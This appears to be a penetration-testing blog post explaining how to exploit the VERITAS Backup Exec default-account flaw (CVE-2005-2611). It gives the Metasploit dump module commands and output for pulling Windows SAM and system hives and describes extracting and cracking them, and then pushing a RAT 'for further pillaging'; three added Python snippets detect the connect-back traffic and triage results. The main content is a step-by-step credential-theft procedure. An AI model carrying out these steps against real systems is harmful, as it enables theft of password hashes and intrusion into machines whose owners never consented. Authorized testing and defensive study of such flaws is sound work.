By Tony Lee
Introduction
I recently saw this old gem on a pentest, but when trying to explain the attack process to a colleague I could not find a good article, so I think it is worth writing one.
The finding in question is picked up by Nessus as:
VERITAS Backup Exec Remote Agent Static Password Arbitrary File Download (CVE-2005-2611)
The description reads:
"The remote host is running a version of VERITAS Backup Exec Agent which is configured with a default root account. An attacker may exploit this flaw to retrieve files from the remote host."
At first, you may think "so what?", but if you can grab any file, why not grab a copy of the password hashes stored on disk? Fortunately for us, there is a process that can be followed.
The major steps involved are:
- Grab the files
- Extract the files
- Crack the hashes
Grab the files
First we need to figure out which files we want to grab.
On a domain controller, domain hashes are found in NTDS.dit:
- C:\windows\ntds\NTDS.DIT
On a workstation, you might remember that local system password hashes reside within two places:
- C:\windows\system32\config
- C:\windows\repair
For this exercise, let's focus on the workstation since it will be more probable. The config directory contains a copy of the current hashes. The repair directory contains a copy of the hashes as of the last restore point. Since the restore point may be in the past and thus not current, why do we care about the repair directory? Well, if for some reason you cannot pull down the config directory (you get a 0 byte file or the exploit fails), try the repair directory. I have seen the exploit fail because the files are in use by the operating system. The repair directory may yield an account that still exists with a static password. The process is the same either way, so first try the config directory and if that fails, we will move to the repair directory. Now to the exploit...
We are fortunate that the exploit is already written for us and is available within Metasploit.
```
msf > use auxiliary/admin/backupexec/dump
msf auxiliary(dump) > show options

Module options (auxiliary/admin/backupexec/dump):

   Name   Current Setting      Required  Description
   ----   ---------------      --------  -----------
   LHOST                       no        The local IP address to accept the data connection
   LPATH  backupexec_dump.mtf  yes       The local filename to store the exported data
   LPORT                       no        The local port to accept the data connection
   RHOST                       yes       The target address
   RPATH  C:\Windows\win.ini   yes       The remote filesystem path to download
   RPORT  10000                yes       The target port

Auxiliary action:

   Name      Description
   ----      -----------
   Download

msf auxiliary(dump) >
```
Start small by pulling the default file shown (win.ini). Thus, the only required parameter above that is currently not populated is RHOST, so let's set it. Assuming your target is 192.168.2.10, we would use the following:
```
msf auxiliary(dump) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
```
If that is successful, go for gold: point RPATH at the config directory (c:\windows\system32\config) and run the module again.
```
[*] Attempting to retrieve c:\windows\system32\config
[*] Sending magic authentication request...
[*] Starting our data listener...
[*] Sending data connection request...
[*] Waiting for the data connection...
[*] Sending transfer parameters...
[*] Sending backup request...
[*] Sending environment request...
[*] Transferring data...
[*] Transferred 62194541 bytes.
[*] Auxiliary module execution completed
msf auxiliary(dump) >
```
If all goes well, the downloaded file should not be a zero byte file and you can start the extraction. If the module fails or the file is a zero byte file, change RPATH to the repair directory (c:\windows\repair) and run the module again.
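The module output above also shows what a defender can look for: an inbound connection to the agent port, followed by the agent itself opening a data connection back to the same remote host that carries the bulk transfer. The following is an added example (not code from the original post or from Metasploit) that flags that pattern in constructed flow records; the field order, the time window, the byte threshold and the set of legitimate backup servers are all assumptions.

```python
"""Flag the Backup Exec agent connect-back pattern in flow records.

Added illustration, not part of the original post or of Metasploit. The flow
lines are constructed; the field order (time,src,sport,dst,dport,bytes) and
the set of legitimate backup servers are assumptions. Sequence to key on: an
inbound connection to the agent port (TCP/10000), then the agent opening an
outbound data connection back to the same remote host with a large payload.
"""
from collections import defaultdict
from datetime import datetime

AGENT_PORT = 10000       # RPORT in the module above
WINDOW_SECONDS = 60      # data connection must follow the control connection this quickly
MIN_BYTES = 1_000_000    # a hive dump is tens of MB; win.ini is a few KB
BACKUP_SERVERS = {"10.0.0.9"}   # hosts expected to talk to the agent port (assumed)

# constructed sample: time,src,sport,dst,dport,bytes
FLOWS = """\
2024-03-01T10:00:01,10.0.0.5,51010,10.0.0.20,10000,640
2024-03-01T10:00:02,10.0.0.20,49711,10.0.0.5,4444,62194541
2024-03-01T10:05:00,10.0.0.9,44000,10.0.0.20,10000,900
2024-03-01T10:05:30,10.0.0.20,49800,10.0.0.9,445,1200
2024-03-01T11:00:00,10.0.0.7,50000,10.0.0.21,10000,500
2024-03-01T11:00:01,10.0.0.21,49900,10.0.0.7,5555,70000000
"""

def parse(text):
    rows = []
    for line in text.splitlines():
        ts, src, sport, dst, dport, nbytes = line.split(",")
        rows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport), int(nbytes)))
    return rows

def find_connect_backs(rows, backup_servers=BACKUP_SERVERS):
    """Return (remote, agent_host, bytes) for each control+data pair worth an alert."""
    controls = defaultdict(list)   # (remote, agent) -> times of inbound agent-port connections
    for ts, src, _, dst, dport, _ in rows:
        if dport == AGENT_PORT and src not in backup_servers:
            controls[(src, dst)].append(ts)
    hits = []
    for ts, src, _, dst, _, nbytes in rows:
        # agent host -> remote, shortly after the control connection, with a large payload
        for t0 in controls.get((dst, src), []):
            if 0 <= (ts - t0).total_seconds() <= WINDOW_SECONDS and nbytes >= MIN_BYTES:
                hits.append((dst, src, nbytes))
                break
    return hits
```

The legitimate backup server's own session (small reply on 445) is not flagged, while the two large connect-backs are.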
Extract the files
This step requires a Windows binary called ntbkup.exe to extract the files from the .mtf archive. It used to be available from www.fpns.net, but that site seems to have changed hands. If you want a known clean copy, message me and I will provide it free of charge. Otherwise, feel free to obtain it from a slightly less reputable source at your own risk.
The syntax for the extraction is:
This is what it will look like for a successful extraction:
```
NTBKUP Ver 1.07c compiled for WIN32 with MAX_PATH = 100
compiled for 64 bit file offsets
Copyright (C) 2003 William T. Kranz
NTBKUP comes with ABSOLUTELY NO WARRANTY
Free software distributed under the terms of the GNU General Public license
See http://www.gnu.org/licenses/gpl.html for license information
Check http://www.fpns.net/willy/msbackup.htm for Updates & Documentation
--snip--
extracing: SAM:
data from 0x1d4166 to 0x28f808
length 767650 atrib 0x80 02/16/2010 02:07:13 PM
extracing: secsetup.inf:
data from 0x28fd32 to 0x2a2d32
length 77824 atrib 0x20 12/11/2012 06:13:32 PM
extracing: SECURITY:
data from 0x2a3162 to 0x2d589b
length 206649 atrib 0x80 02/16/2010 02:06:13 PM
extracing: setup.log:
data from 0x2d5d76 to 0x2e2f76
length 53760 atrib 0x20 12/11/2012 06:19:39 PM
extracing: smss.ASR:
data from 0x2e3132 to 0x195e132
length 23572480 atrib 0x20 12/11/2012 06:13:37 PM
extracing: software:
data from 0x195e52e to 0x1da152e
length 4468736 atrib 0x20 12/11/2012 06:13:44 PM
extracing: system:
data from 0x1da253a to 0x1da7cea
length 22448 atrib 0x20 02/27/2010 03:32:01 PM
--snip--
```
The two most important files contained above are the SAM file and the system file. I ignored most of the rest.
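Before moving on it is worth checking that the two hives actually came out intact. The following is an added example (not code from the original post or from ntbkup) that parses the extraction log format shown above; the excerpt it parses is constructed from that output, and the "end minus start equals length" check is an observation about the log records above, not a documented ntbkup guarantee.

```python
"""Sanity-check an ntbkup extraction log before moving on to cracking.

Added illustration, not part of the original post or of ntbkup. The excerpt
is constructed from the record format shown above ("extracing:" line naming
the file, "data from <start> to <end>", "length <n> atrib <flags> <date>").
End minus start must equal the reported length; a zero length or a mismatch
means the hive is not usable and the repair directory is the next stop.
"""
import re

NTBKUP_LOG = """\
extracing: SAM:
data from 0x1d4166 to 0x28f808
length 767650 atrib 0x80 02/16/2010 02:07:13 PM
extracing: SECURITY:
data from 0x2a3162 to 0x2d589b
length 206649 atrib 0x80 02/16/2010 02:06:13 PM
extracing: system:
data from 0x1da253a to 0x1da7cea
length 22448 atrib 0x20 02/27/2010 03:32:01 PM
extracing: broken.hiv:
data from 0x100 to 0x100
length 0 atrib 0x20 01/01/2010 12:00:00 AM
"""

NEEDED = ("SAM", "system")   # the two hives samdump2 needs

RECORD = re.compile(
    r"extracing: (?P<name>[^:\n]+):\s*\n"
    r"data from 0x(?P<start>[0-9a-f]+) to 0x(?P<end>[0-9a-f]+)\s*\n"
    r"length (?P<length>\d+) atrib 0x(?P<attrib>[0-9a-f]+)",
    re.IGNORECASE,
)

def parse_ntbkup_log(text):
    """Map each extracted file name to its reported length and whether the offsets agree."""
    files = {}
    for m in RECORD.finditer(text):
        span = int(m["end"], 16) - int(m["start"], 16)
        length = int(m["length"])
        files[m["name"]] = {"length": length, "consistent": span == length}
    return files

def usable_hives(files, needed=NEEDED):
    """Names from `needed` that were extracted with a non-zero, self-consistent length."""
    return [n for n in needed if n in files and files[n]["length"] > 0 and files[n]["consistent"]]

def missing_hives(files, needed=NEEDED):
    """Names from `needed` that must be re-extracted."""
    return [n for n in needed if n not in usable_hives(files, needed)]
```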
Crack the hashes
As mentioned previously, the most important files extracted are the SAM and system file. The SAM file is encrypted with a protection called syskey. The system file is used to decrypt the SAM file into hashes we can crack. There are many methods to crack this file, but here are two simple methods:
- Cain and Abel
- samdump2
We are going to focus on using samdump2 because it is fast and native in Kali, but in case you are curious, here is a reference for instructions to use Cain and Abel: http://www.oxid.it/ca_um/topics/nt_hashes_dumper.htm
samdump2 is a very easy to use program and works great for this specific instance. Copy the SAM and system file over to your Kali host and use the following syntax:
That's it! Open hashes.txt with your favorite text editor (the right answer is vi) and view your trophy. Throw it into John the Ripper or a GPU cracker and you are in business. Hopefully a local administrator password will crack and you can use remote desktop or push your favorite RAT for further pillaging.
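Once hashes.txt exists it is worth a quick triage before anything is fed to a cracker. The following is an added example (not code from the original post or from samdump2) that reads the pwdump-style lines samdump2 writes and reports blank passwords, accounts that still store an LM hash, and accounts sharing one NT hash; the sample lines are constructed, and only the two empty-password hash constants are real values.

```python
"""Triage a pwdump-style hashes.txt (the format samdump2 writes) before cracking.

Added illustration, not part of the original post or of samdump2. The sample
lines are constructed (user:RID:LM:NT:::); only EMPTY_LM and EMPTY_NT are
real, well-known values. The report says which accounts have a blank
password, which still store an LM hash, and which share one NT hash.
"""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:00ff00ff00ff00ff00ff00ff00ff00ff:::
"""

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for each non-empty line; hashes are normalised to lowercase."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, rid, lm, nt, *_ = line.split(":")
        yield user, int(rid), lm.lower(), nt.lower()

def triage(text):
    findings = {"empty_password": [], "lm_hash_stored": [], "shared_nt_hash": []}
    by_nt = {}
    for user, _rid, lm, nt in parse_pwdump(text):
        if nt == EMPTY_NT:
            findings["empty_password"].append(user)
        if lm != EMPTY_LM:
            findings["lm_hash_stored"].append(user)   # LM storage weakens the password
        by_nt.setdefault(nt, []).append(user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].append(sorted(users))
    return findings
```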
Summary
We hope you enjoyed that blast from the past and found it useful. Again, reach out if you cannot find the ntbkup.exe binary from a legit source and I can email it to you. Thanks for reading and happy hacking!
Props
- Rapid7/Metasploit team: https://www.rapid7.com/db/modules/auxiliary/admin/backupexec/dump